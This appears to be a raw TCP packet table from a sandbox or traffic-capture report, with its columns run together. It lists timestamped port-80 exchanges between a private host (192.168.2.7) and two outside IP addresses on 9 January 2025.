                                                                                                                                                    Jan 9, 2025 08:02:20.202147961 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.202811956 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202857971 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202868938 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202896118 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.202938080 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202950954 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202974081 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.203083992 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.203126907 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.203752041 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.203768015 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.203779936 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.203821898 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.203893900 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.203906059 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.203916073 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.203928947 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.203949928 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.276842117 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.276864052 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.276876926 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.276906967 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.276918888 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.276932001 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.276995897 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.277069092 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.277151108 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.346451998 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:44.433144093 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:44.437979937 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:44.438039064 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:44.438400030 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:44.438425064 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:44.443207026 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:44.443217039 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.418756008 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.418781042 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.418793917 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.418836117 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.418910027 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.418925047 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.418936968 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.418960094 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.418982029 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.418989897 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.418999910 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.419034958 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.419035912 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.419116020 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.419282913 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.423701048 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.423732996 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.423788071 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.540823936 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.540842056 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.540894032 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.554013968 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554039955 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554049969 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554064035 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554111004 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.554198980 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.554306984 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554317951 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554332972 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554366112 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.554429054 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554470062 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.554898977 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554909945 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554922104 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.554960966 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.555284977 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555295944 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555322886 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555335999 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.555362940 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.555407047 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555963993 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555988073 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.555999994 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556011915 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556025982 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556039095 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.556065083 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.556673050 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556734085 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556746006 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556786060 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.556794882 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.556880951 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.558938980 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.607976913 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.676004887 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.676019907 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.676033020 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.676106930 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.689594030 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689606905 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689618111 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689630985 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689665079 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.689704895 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.689811945 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689822912 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689832926 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.689860106 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.689882994 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.689979076 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690042019 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690053940 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690085888 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.690259933 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690269947 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690295935 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.690376997 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690418959 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.690449953 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690464973 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690680027 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690689087 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690726042 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.690787077 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690814972 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690829039 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.690870047 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691052914 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691093922 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691123962 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691134930 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691174030 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691344023 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691410065 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691423893 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691462040 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691464901 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691731930 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691751957 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691783905 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691812038 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.691953897 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691965103 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.691976070 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692004919 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.692197084 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692208052 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692229986 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692240953 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.692276955 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.692317009 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692558050 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692567110 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692609072 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.692673922 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692692995 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692703009 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.692724943 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.692740917 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.693013906 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693023920 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693041086 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693064928 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.693092108 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693104029 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693140984 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.693548918 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693561077 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693571091 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693603039 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.693788052 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693799973 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.693839073 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.720618963 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.720629930 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.720642090 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.720655918 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.720695019 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.720740080 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.799387932 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.799401999 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.799437046 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.799551010 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.799631119 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.799642086 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.799685955 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.811043024 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.811290026 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.824759007 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824776888 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824798107 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824832916 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.824872017 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824882984 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824915886 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.824939013 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.824976921 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.824986935 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825000048 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825045109 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.825228930 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825238943 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825273037 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.825377941 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825387955 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825406075 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825422049 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825422049 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.825434923 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825467110 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.825618982 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825629950 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825639963 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825671911 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.825684071 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825687885 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.825695992 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825737953 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.825870991 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825880051 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825922012 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.825951099 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.825961113 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826011896 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.826147079 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826194048 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826204062 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826241970 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.826296091 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826344967 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.826412916 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826524973 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826538086 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826562881 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826571941 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826584101 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.826615095 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.826692104 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826791048 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826833963 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.826893091 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826922894 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.826927900 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.826935053 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827007055 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827013016 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.827301025 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827370882 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827380896 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827418089 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827420950 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.827441931 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827482939 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.827539921 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827548981 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827584982 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.827595949 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827652931 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827662945 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.827701092 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.828136921 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.828181028 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.828191996 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.828205109 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.828243017 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.829709053 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.829720020 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.829730988 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.829757929 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.829758883 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.829771996 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.829782963 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.829806089 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.829828024 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.829963923 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.829974890 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.829987049 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.829999924 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830010891 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830014944 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.830029964 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.830108881 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830120087 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830132961 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830152035 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830158949 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.830180883 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.830508947 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830528975 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830555916 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.830585957 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830595970 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830621958 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.830652952 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830692053 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.830699921 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830710888 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830739021 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.830773115 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830784082 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.830820084 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.831053972 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.831064939 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.831077099 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.831100941 CET4991380192.168.2.746.173.214.14
